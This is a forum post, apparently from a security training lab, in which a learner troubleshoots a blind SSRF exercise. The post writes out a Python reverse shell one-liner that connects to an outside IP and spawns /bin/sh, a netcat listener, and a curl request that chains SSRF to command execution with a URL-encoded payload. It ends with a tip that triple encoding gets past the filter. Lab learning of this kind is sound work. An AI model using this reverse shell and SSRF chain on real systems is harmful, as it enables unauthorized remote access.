SERVER-SIDE ATTACKS Blind SSRF Exploitation Example

Hey, I’m trying to complete Blind SSRF Exploitation Example, but I can’t create a reverse shell to my netcat. Btw i’m using my local kali machine, not pwnbox, but on pwnbox i’m having the same problem

  1. I’ve twise encoded python reverse shell from the module.

Reverse shell before encoding :

export RHOST="10.10.15.192";export RPORT="9999";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
  1. Run netcat -nlvp 9999

  2. curl -i -s "http://10.129.41.183/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=python%2520-c%2520%2527import%2520sys%252Csocket%252Cos%252Cpty%253Bs%253Dsocket.socket%2528%2529%253Bs.connect%2528%2528os.getenv%2528%252210.10.15.192%2522%2529%252Cint%2528os.getenv%2528%25229999%2522%2529%2529%2529%2529%253B%255Bos.dup2%2528s.fileno%2528%2529%252Cfd%2529%2520for%2520fd%2520in%2520%25280%252C1%252C2%2529%255D%253Bpty.spawn%2528%2522%252Fbin%252Fsh%2522%2529%2527"

  3. I’m getting this response (“URL can’t contain control characters”):
    <html><body><h1>Resource: http://127.0.0.1:5000/runme?x=python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("10.10.15.192"),int(os.getenv("9999"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'</h1><a>URL can't contain control characters. '/runme?x=python -c \'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("10.10.15.192"),int(os.getenv("9999"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")\'' (found at least ' ')</a></body></html>

and nothing happens.

Can anyone help me please?

Ok, nevermind. I finally did it. I dont know why author said that you need to encode payload twise. You actually need to encode payload 3 times.

2 Likes